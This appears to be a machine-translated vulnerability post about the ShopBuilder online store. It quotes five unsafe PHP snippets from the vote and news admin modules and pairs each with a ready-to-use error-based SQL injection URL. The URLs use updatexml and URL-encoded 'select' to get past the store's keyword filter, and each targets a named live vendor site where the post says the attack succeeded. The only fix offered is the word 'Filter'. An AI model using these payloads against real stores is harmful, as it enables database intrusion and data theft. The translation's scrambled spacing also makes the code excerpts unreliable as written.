ShopBuilder online store get-type SQL Injection packaging (1 ~ 5) The demo test on the official website is successful.

ShopBuilder online store get-type SQL Injection packaging (1 ~ 5) The demo test on the official website is successful.

 

First, the get type is filtered.

If (inject_check ($ _ SERVER ["REQUEST_URI"]) {die ('invalid URL! ');} Function inject_check ($ SQL) {return preg_match ("/(select | insert | delete | \. \. \/| \. \/| union | into | load_file | outfile | \ '| % 27 | {| \ ()/I ", $ SQL); // filter}

However, we can ignore this filter, and we can bypass the url encoding.

#1

Module \ vote \ admin \ vote. php)

49 rows

if(!empty($_GET['vid'])){$sql="select * from ".NEWSVOTE." where id=$_GET[vid]";echo $sql;$db->query($sql);$re=$db->fetchRow();$vote=explode('|',$re['votetext']);for($i=0;$i<count($vote);$i++){$vote[$i]=explode(',',$vote[$i]);}}

Vid not filtered

Official Website test http://www.a5shop.cn /? M = vote/admin & s = vote & vid = 11% 20and % 201 = updatexml % 281, concat % 280x5c, % 28% 73 elect user % 28% 29% 29% 29,1% 29


 

#2
 

module\vote\admin\vote_list.phpif(!empty($_GET['did'])){$id=$_GET['did'];}if(!empty($id)){if($submit==lang_show('del') or !empty($_GET['did'])){   $sql="delete from ".NEWSVOTE." where id in ($id)";}if($submit==lang_show('bres'))  $sql="update ".NEWSVOTE." set type=1 where id in ($id)";if($submit==lang_show('nbres'))  $sql="update ".NEWSVOTE." set type=0 where id in ($id)"; $db->query($sql);}

 

The did is not filtered and then brought into the id for query.

Official Website Test

Http://www.a5shop.cn /? M = vote/admin & s = vote_list & did = 11% 20and % 201 = updatexml % 281, concat % 280x5c, % 28% 73 elect user % 28% 29% 29% 29,1% 29



#3

Module \ news \ admin \ news. php

92 rows

if($_POST['act']=='edit' and !empty($_GET['newsid'])){$sql="update ".NEWSD." set title='$_POST[title]',ftitle='$_POST[ftitle]',keyboard='$_POST[key]',titleurl='$_POST[links]', isrec='$_POST[rec]', istop='$_POST[istop]',ispass='$_POST[pass]',onclick='$_POST[onclick]',titlefont='$titlefont',uptime='$time',smalltext='$_POST[smalltext]',writer='$_POST[writer]',source='$_POST[source]',titlepic='$pname',ispic='$ispic',isgid='$_POST[group]',ispl='$_POST[closepl]',userfen='$_POST[userfen]',newstempid='$_POST[newstempid]',imgs_url='$imgs_url',videos_url='$video_url',vote='$vote',admin='$_POST[admin]',special='$special',lastedittime='".time()."' where nid= $_GET[newsid]";$re=$db->query($sql);$sql="update ".NEWSDATA." set con='$_POST[body]' where nid= $_GET[newsid]";

Newsid not filtered



Official Website Test

Http://www.a5shop.cn /? M = news/admin & s = news & newsid = updatexml % 281, concat % 280x5c, % 28% 73 elect user % 28% 29% 29% 29,1% 29



#4

Module \ news \ admin \ newslist. php

Starting

if(!empty($_GET['did'])){$id=$_GET['did'];}if(!empty($id)){if($submit==lang_show('del') or !empty($_GET['did'])){   $sql="delete from ".NEWSD." where nid in ($id)";   $db->query($sql);   $sql="delete from ".NEWSDATA." where nid in ($id)";}

Official Website Test

Http://www.a5shop.cn /? M = news/admin & s = newslist & did = 1% 29% 20and % 201 = updatexml % 281, concat % 280x5c, % 28 select % 20 user % 28% 29% 29% 29,1% 29% 23



#5

Module \ news \ admin \ newslist. php

37 rows

if($submit==lang_show('copy') and !empty($_GET['nclass'])){ foreach($_GET['chk'] as $val){$sql="INSERT ".NEWSD."(title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,classid,lastedittime) select title,ftitle,keyboard,titleurl,isrec,istop,ispass,firsttitle,onclick,titlefont,uid,uptime,smalltext,writer,source,titlepic,ispic,isgid,ispl,userfen,newstempid,pagenum,imgs_url,videos_url,vote,special,'$_GET[nclass]',lastedittime from ".NEWSD." where nid =$val";$db->query($sql);$id=$db->lastid();$sql="INSERT INTO ".NEWSDATA." (con,nid) select con,$id from ".NEWSDATA." where nid =$val";$re=$db->query($sql);}}

When nclass is not empty and chk is an array

Official Website Test

Http://www.a5shop.cn /? M = news/admin & s = newslist & nclass = 1 & chk [] = 1% 29 and 1 = updatexml % 281, concat % 280x5c, % 28% 73 elect user % 28% 29% 29% 29,1% 29% 23
 

 

 

 

Solution:

Filter